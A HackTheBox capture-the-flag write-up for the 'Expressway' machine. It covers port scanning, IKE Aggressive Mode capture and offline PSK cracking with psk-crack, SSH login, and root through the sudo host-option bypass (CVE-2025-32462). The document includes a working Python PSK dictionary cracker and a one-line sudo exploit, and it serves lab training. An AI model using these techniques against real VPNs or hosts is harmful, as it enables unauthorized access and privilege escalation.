Expressway HTB Writeup | HacktheBox | Season 9
Start with a fast TCP and UDP sweep to find services.
# full TCP and UDP port sweep (raw-socket scans, so run as root)
nmap -sS -sU -T4 -p- --min-rate 1000 expressway.htb -oA scans/expressway/full
# script/version scan of what was found; a bare -p22,500 would probe 500/tcp,
# so split the port spec by protocol
nmap -sS -sU -sC -sV -p T:22,U:500 expressway.htb -oA scans/expressway/services
Result: SSH on 22/tcp and an IKE/ISAKMP responder on 500/udp.
Because UDP/500 was open, probe the service with ike-scan. In Aggressive Mode the responder sends its identity and HASH_R in the clear, which is everything an offline PSK attack needs.
# Main Mode is the default; -M only splits the output over several lines
ike-scan -M expressway.htb
# Aggressive Mode: -P writes the PSK-crack parameter line
# (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r) to a file for psk-crack
ike-scan -A -M -Pike-agg.txt expressway.htb
Aggressive Mode returned an identity of [email protected] in the responder's ID payload, together with HASH_R; the parameters were saved to ike-agg.txt for cracking.
Feed the saved parameters to psk-crack, which ships with ike-scan. It reads the parameter line that ike-scan -P writes (not a pcap) and infers MD5 or SHA-1 from the length of HASH_R, so no conversion is needed.
# ike-agg.txt holds the line written by ike-scan -A -P
psk-crack -d /usr/share/wordlists/rockyou.txt ike-agg.txt | tee cracked.txt
# on success psk-crack reports the matching key (here [REDACTED-PSK]) and its HASH_R
Important: the PSK recovered in the lab is redacted here as [REDACTED-PSK]. Never publish real shared secrets.
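What psk-crack actually does with that parameter line, as an added example in Python (not code from this writeup, and not ike-scan or psk-crack source): parse the nine colon-separated hex fields, derive SKEYID from a candidate PSK and the two nonces, recompute the responder's HASH_R and compare. The parameter line, the identity ike@example.test, the wordlist and the throwaway PSK are all constructed inside the script; nothing here is lab data.

```python
#!/usr/bin/env python3
"""Offline IKEv1 Aggressive Mode PSK recovery (RFC 2409, section 5.4).

Added example, not part of the original writeup and not ike-scan/psk-crack
code. It reimplements the check psk-crack performs on the parameter line
that `ike-scan -A -P<file>` writes. Every input is constructed below.
"""
import hashlib
import hmac
from typing import Dict, Iterable, Optional

# Field order of a psk-crack parameter line (hex fields separated by ':').
FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")


def parse_psk_params(line: str) -> Dict[str, bytes]:
    """Split one parameter line into its raw byte fields."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return dict(zip(FIELDS, (bytes.fromhex(p) for p in parts)))


def prf_for(hash_r: bytes):
    """The negotiated PRF is HMAC over the hash; infer it from HASH_R's length."""
    try:
        return {16: hashlib.md5, 20: hashlib.sha1}[len(hash_r)]
    except KeyError:
        raise ValueError(f"unsupported HASH_R length {len(hash_r)}") from None


def compute_hash_r(psk: bytes, p: Dict[str, bytes]) -> bytes:
    """Recompute the responder's HASH_R for a candidate PSK."""
    digest = prf_for(p["hash_r"])
    # SKEYID = prf(pre-shared-key, Ni_b | Nr_b)
    skeyid = hmac.new(psk, p["ni_b"] + p["nr_b"], digest).digest()
    # HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    msg = p["g_xr"] + p["g_xi"] + p["cky_r"] + p["cky_i"] + p["sai_b"] + p["idir_b"]
    return hmac.new(skeyid, msg, digest).digest()


def crack_psk(line: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack: return the first candidate whose HASH_R matches, else None."""
    p = parse_psk_params(line)
    for word in candidates:
        if hmac.compare_digest(compute_hash_r(word.encode(), p), p["hash_r"]):
            return word
    return None


def make_sample_line(psk: str, use_md5: bool = False) -> str:
    """Constructed responder parameters for a known PSK (test data only).

    Sizes mirror a real exchange (1024-bit DH group 2 public values, 8-byte
    cookies, a 4-byte ID header before the identity) but the bytes are
    deterministic filler, not captured traffic.
    """
    def filler(tag: bytes, n: int) -> bytes:
        return (hashlib.sha256(tag).digest() * (n // 32 + 1))[:n]

    p = {
        "g_xr": filler(b"g_xr", 128),
        "g_xi": filler(b"g_xi", 128),
        "cky_r": filler(b"cky_r", 8),
        "cky_i": filler(b"cky_i", 8),
        "sai_b": filler(b"sai_b", 52),
        # ID_USER_FQDN (type 3), protocol 17, port 500, then a hypothetical identity
        "idir_b": bytes([3, 17]) + (500).to_bytes(2, "big") + b"ike@example.test",
        "ni_b": filler(b"ni_b", 20),
        "nr_b": filler(b"nr_b", 20),
    }
    # Placeholder of the right length so compute_hash_r selects the digest.
    p["hash_r"] = bytes(16 if use_md5 else 20)
    p["hash_r"] = compute_hash_r(psk.encode(), p)
    return ":".join(p[f].hex() for f in FIELDS)


if __name__ == "__main__":
    WORDLIST = ["password", "123456", "vpnvpn", "s3cret-lab-psk", "letmein"]  # constructed
    sample = make_sample_line("s3cret-lab-psk")
    print("cracked PSK:", crack_psk(sample, WORDLIST))
```

The attack is cheap because one candidate costs two HMACs and nothing in the exchange rate-limits an attacker who already holds the capture; that is why a dictionary word as a PSK falls in seconds and why the page redacts the recovered value.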
The recovered PSK gave a login on the host (PSK-derived credentials, or the VPN session it authenticates). SSH in as ike:
ssh ike@expressway.htb # authentication method and cleartext password omitted for safety
Once on the box:
id
hostname
ls -la /home/ike
cat /home/ike/user.txt # user flag
user.txt was present in /home/ike.
Standard enumeration gave the clues needed for escalation:
uname -a
cat /etc/os-release
sudo -V # shows Sudo version 1.9.17
ps aux
find / -perm -4000 -type f 2>/dev/null
grep -R "offramp" /var/log 2>/dev/null || true
Important find: the logs contained the hostname offramp.expressway.htb, which is exactly what the sudo bypass needs.
Sudo 1.9.17 is vulnerable to the -h/--host option bypass (CVE-2025-32462, fixed in 1.9.17p1). The host option was meant only for listing privileges (sudo -l -h host), but sudo also honoured it when running a command, so a sudoers rule that grants a user commands on some other host can be exercised on this box simply by naming that host. Here the rule is scoped to offramp.expressway.htb, the name found in the logs; sudo -l -h offramp.expressway.htb shows whether such a rule exists before you try it.
Lab PoC; the single invocation below is the whole exploit:
# confirm the version
sudo -V
# name the host from the logs and request a login shell
/usr/local/bin/sudo -h offramp.expressway.htb -i
# -> root shell in the lab
After gaining a root shell:
cat /root/root.txt # root flag
An alternate local exploit, CVE-2025-32463 (the --chroot/-R option bug fixed in the same 1.9.17p1 release), was also tested and worked as a fallback.
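A small triage helper for the sudo -V check used above, covering both the host-option bug and the chroot fallback named in this section; it is added here in Python and is not the writeup's code. The ranges come from the sudo advisories: CVE-2025-32462 affects 1.8.8 through 1.9.17 and CVE-2025-32463 affects 1.9.14 through 1.9.17, both fixed in 1.9.17p1. The sample version strings are constructed.

```python
#!/usr/bin/env python3
"""Triage `sudo -V` output against the two sudo 1.9.17-era local root bugs.

Added example, not part of the original writeup. Ranges are per the sudo
advisories: CVE-2025-32462 (host option honoured when running commands,
1.8.8 through 1.9.17) and CVE-2025-32463 (--chroot, 1.9.14 through 1.9.17);
both were fixed in 1.9.17p1. Sample outputs below are constructed.
"""
import re
from typing import List, Optional, Tuple

Version = Tuple[int, int, int, int]  # major, minor, patch, "p" level

# CVE -> (first affected, first fixed): affected when first <= v < fixed
AFFECTED = {
    "CVE-2025-32462": ((1, 8, 8, 0), (1, 9, 17, 1)),
    "CVE-2025-32463": ((1, 9, 14, 0), (1, 9, 17, 1)),
}

_VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(output: str) -> Optional[Version]:
    """Extract the version tuple from `sudo -V` output; None if absent.

    The trailing pN is a patch level, so 1.9.17p1 sorts after 1.9.17; a
    plain string comparison or a regex on the first three numbers would
    flag the patched release as vulnerable.
    """
    m = _VERSION_RE.search(output)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def affected_cves(output: str) -> List[str]:
    """CVE IDs whose affected range contains the reported upstream version."""
    v = parse_sudo_version(output)
    if v is None:
        return []
    return [cve for cve, (lo, fixed) in AFFECTED.items() if lo <= v < fixed]


if __name__ == "__main__":
    # Constructed samples of the first line `sudo -V` prints.
    for sample in ("Sudo version 1.9.17", "Sudo version 1.9.17p1",
                   "Sudo version 1.9.13p3", "Sudo version 1.8.7"):
        print(f"{sample:24} -> {affected_cves(sample) or 'outside both ranges'}")
```

Distributions often backport the fix without bumping the upstream version, so a match means "check the package changelog", not proof. For the host bug the telling sign is that sudo -l -h <other host> lists rules that plain sudo -l does not; on a patched sudo those rules are still listed but no longer honoured when running a command.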
user.txt found at /home/ike
root.txt found at /root
All sensitive outputs and credentials have been redacted in this public writeup.
Access is restricted by HackTheBox rules: the full solution can be published once the machine retires.